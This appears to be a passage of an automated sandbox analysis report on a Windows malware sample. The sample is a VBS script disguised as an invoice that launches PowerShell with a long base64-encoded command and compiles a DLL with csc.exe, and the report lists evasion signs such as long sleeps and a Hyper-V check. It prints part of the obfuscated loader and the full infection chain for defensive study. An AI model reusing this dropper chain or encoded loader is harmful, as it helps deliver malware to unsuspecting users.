    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "IwBOAGEAbgBkAGkAbgBtAGUANQAgAEIAbwBiAGwAZQBrAGEAIABBAHIAdABpAGsAdQBsAGUAcgAgAGgAbwB0AG0AIABGAG8AcgBtAG4AaQBuADQAIABWAGkAZwBlAHMAaQBtAG8AawBpADYAIABzAHQAbwBtACAARQBjAGgAaQBuAGkAdAA2ACAAcAByAG8AbgBhAHQAaQB2ACAAUAB5AHIAbwAgAFQAZQB4AHQAdAB2ADcAIABFAGwAZQB2AGEAdABvAHIAZgByACAAUgBBAE0AUgBPAEQAUwBBACAAUQBlAGsAdQByAHMAdQBzAHMAIABiAGUAYQBuAHAAbwAgAFMAawByAGsAMgAgAHAAbwBsAGEAcgBpACAAbQBlAGQAZQBvAGwAYQAgAEwAbwByAGEAIABSAGEAcABoAGkANgAgAA0ACgAjAGQAZQBmAGEAIABwAGkAZQBkACAAVABhAG4AZABrAGQAcwBiAGUAIABVAG4AaQBtAG0AbwByACAAQgBhAGQAZwBlAHIAYgA2ACAAZQB4AGMAbAB1AHMAIABDAGgAbwBuAGQAcgBvAGcAOAAgAEEARQBSAE8ATABPACAARgBJAFMASABFAFIATQBBAE4ASQAgAEYAQQBHAEkATgBUAEUARwBSACAASQBuAGMAZQBwAHQAbwAzACAAUwBuAHUAcgBsADYAIABCAGkAcwBlAHgAdQBhACAAZABvAHMAcwBlAHIAIABnAGEAdgBlAGwAIABtAGUAdABhAGYAbwByAGUAIAB0AHIAYQBuACAAYQB0AGEAawAgAFMAZQBpAHMAbQBpADIAIABOAG8AbgBmAGEAYgB1AGwAIABEAGkAZwB0AGUAawAzACAAUgBFAEcATgBTAEsAQQAgAFAAaAB5AHQAbwBtAGUAOQAgAE0AdQByAGEAZQAgAEgAYQBsAHYAOAAgAFYATwBDAEkARgBFAFIAQQBUAEUAIABXAE8ATwBEAEMAUgBBAEYAVAAgAGgAYQByAGQAaABlAGEAcgB0ACAASwBuAGkAYgAgAHMAZQBqAHQAIAANAAoAIwBJAG0AbQBlAHIAdgBrADgAIABTAHAAcgBvAGcAZgBsACAAUgBFAEQAUwBIAEkAIABzAGkAZgBmAGwAZQB1AHMAIABTAHUAcABlAHIAIAByAGkAZgB0AGUAcgBzACAARwByAG8AdQBjAGgAIABQAHIAbwBlAHYAZQB0AGkAIABQAFIATwBUAEUATgBTAEkAIABMAHkAZABiAGkAbABsAGUAZABlACAAUwBVAEIARQBMAEUAQwBUAFIAIABSAGEAbQBtAGUAdABjAGgAbwByACAAQwBJAFMAUwBFAFMAQQBSACAAQgByAGUAZAAgAGoAbwByAGQAZgBzAHQAZQAgAEEAbgB0AGkAcwBlAG4AcwAgAEwATwBYAE8AIAANAAoAIwBTAHAAbAB1AHIAZwB5AHAAeQA3ACAAUwBlAHAAdABlAG4AIABEAGkAbQBzACAAVABlAGIAcgBlAHYAcwB1AG4AYwAyACAAUwB0AHQAdABlAHAAMgAgAGwAaQBrAHYAaQBkAGUAIABBAGYAdAB2AGkAIABwAGEAbgB0AG8AZwAgAHYAZQBqAGIAeQBnACAAYwBvAGMAbwAgAEkAUwBCAFIAWQAgAFAAQQBTAFMAIABQAGkAbgBmACAAbQB1AG4AaQBrAGEAdAAgAHUAbgBzAGUAIABHAFUATABEAFIAIABNAGUAbABvAGQAaQBvAHUAIABwAGEAbgBpAG0AZQB0AGUAIABSAGEAZgB0AGUAcwBvAHMAdABlACAAYQB2AGEAbgBjAGUAbQBlAG4AdAAgAEUAbgB0AGUAYQBzAHUAYgBwAHIAIABNAFkAQwBFACAAVABpAGQAbABuAG4AZQBkAGUAMwAgAG8AZAB5AHMAcwBlAG4AIABkAHIAeQBwAHQAcgByAGUAbgAgAHAAZQByAHMAbwAgAA0ACgAjAGgAbwByAG4AIABDAGUAbgB0AHIANAAgAEgAZQBuAHIAeQBrAGsAZQBzAGwAOAAgAEYATwBSAEQAQQBNAFAATgBJAE4AIABJAG4AdAByAGEAZgBvAGwAIABDAGEAbABkAHIAbwBuACAAaQBuAGYAcgAgAHYAYQBsAGcAIABTAEkAUwBZAFIASQAgAEcAZQBuAG8AYQBrAG8AIABzAGsAYQBkAGUAZwByAGUAcgAgAFUAbgBkAGUAcgBhAGYAcwBuAGkAMgAgAFYAYQBjAGMAaQBuAGEAdAAgAGQAcgBpAGwAbABlAHIAaQBlAHIAIABDAEgAQQBJACAADQAKACMARABlAHQAbwB4AGkAZgAgAGEAZgBtAGEAbABpACAASABtAG0AZQB0AG4AIABBAGwAawBvAGgAbwBsAHQAeQBwADkAIABsAGkAbgBpAGUAIABUAEEAQQBSAE4AIABtAGUAcgBvACAAUwBwAGUAYwB0AHIAbwA4ACAAcwB0AGoAZQByAG4AIABQAG8AcwBpAHQAaQBvACAAQQB1AHQAbwBiAGkAbwAgAHUAdABhAGsAbgBlACAASAB1AG0AYQBuAGgAbwBvADMAIABvAG0AcABsACAAQgBlAHYAaQBzAGYAcgBlAGwAcwAzACAAQgByAGkAbABsAGUAZgBvAGQAZQA2ACAARQBKAEUATgBEAE8ATQBTACAAVAB1AHIAaQBzAHQAawA0ACAAYwBoAGEAbgB0AGEAbgB0ACAAYgBvAG4AZABlAHMAdABhACAAQgBJAEwARgBSAEEARwBUAEUAUgAgAFMASQBEAEgARQBQAFIARQAgAA0ACgAjAFMAawBpAGQAZQBuAHQAIABhAGEAbgJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\xd0x2kfy\xd0x2kfy.cmdlineJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES571F.tmp" "c:\Users\user\AppData\Local\Temp\xd0x2kfy\CSC444B4F613D554F189420B3812D9BACB.TMP"Jump to behavior
    Source: C:\Windows\SysWOW64\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6288:120:WilError_01
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1280:120:WilError_01
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6960:120:WilError_01
    Source: C:\Windows\SysWOW64\unarchiver.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe" /C "C:\Users\user\AppData\Local\Temp\jgrsfdcl.bp3\WWVN_INVOICE_8363567453.vbs
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Documents\20220510Jump to behavior
    Source: C:\Windows\SysWOW64\unarchiver.exeFile created: C:\Users\user\AppData\Local\Temp\tpled5lu.bpnJump to behavior
    Source: classification engineClassification label: mal84.troj.evad.winLZH@17/12@0/1
    Source: C:\Windows\SysWOW64\cmd.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
    Source: C:\Windows\SysWOW64\unarchiver.exeFile opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9445_none_d08c58b4442ba54f\MSVCR80.dllJump to behavior
    Source: Binary string: Xl7C:\Users\user\AppData\Local\Temp\xd0x2kfy\xd0x2kfy.pdb source: powershell.exe, 00000016.00000002.518463762.000000000523E000.00000004.00000800.00020000.00000000.sdmp

    Data Obfuscation

    barindex
    Source: Yara matchFile source: 00000016.00000002.523684015.00000000096D0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\xd0x2kfy\xd0x2kfy.cmdline
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\xd0x2kfy\xd0x2kfy.cmdlineJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\xd0x2kfy\xd0x2kfy.dllJump to dropped file
    Source: C:\Windows\SysWOW64\unarchiver.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\unarchiver.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\unarchiver.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\unarchiver.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\unarchiver.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\unarchiver.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\unarchiver.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\unarchiver.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\unarchiver.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\unarchiver.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\unarchiver.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\unarchiver.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\unarchiver.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\unarchiver.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\unarchiver.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\unarchiver.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\unarchiver.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2510Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2559Jump to behavior
    Source: C:\Windows\SysWOW64\unarchiver.exe TID: 7016Thread sleep count: 131 > 30Jump to behavior
    Source: C:\Windows\SysWOW64\unarchiver.exe TID: 7016Thread sleep time: -65500s >= -30000sJump to behavior
    Source: C:\Windows\SysWOW64\unarchiver.exe TID: 6932Thread sleep time: -922337203685477s >= -30000sJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6172Thread sleep time: -4611686018427385s >= -30000sJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6172Thread sleep time: -922337203685477s >= -30000sJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\xd0x2kfy\xd0x2kfy.dllJump to dropped file
    Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-TimerJump to behavior
    Source: C:\Windows\SysWOW64\unarchiver.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
    Source: C:\Windows\SysWOW64\unarchiver.exeCode function: 0_2_00A2B042 GetSystemInfo,0_2_00A2B042
    Source: C:\Windows\SysWOW64\unarchiver.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: powershell.exe, 00000016.00000002.516850530.000000000500E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V
    Source: powershell.exe, 00000016.00000002.516850530.000000000500E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Xl:C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Hyper-V
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
    Source: C:\Windows\SysWOW64\unarchiver.exeMemory allocated: page read and write | page guardJump to behavior

    HIPS / PFW / Operating System Protection Evasion

    barindex
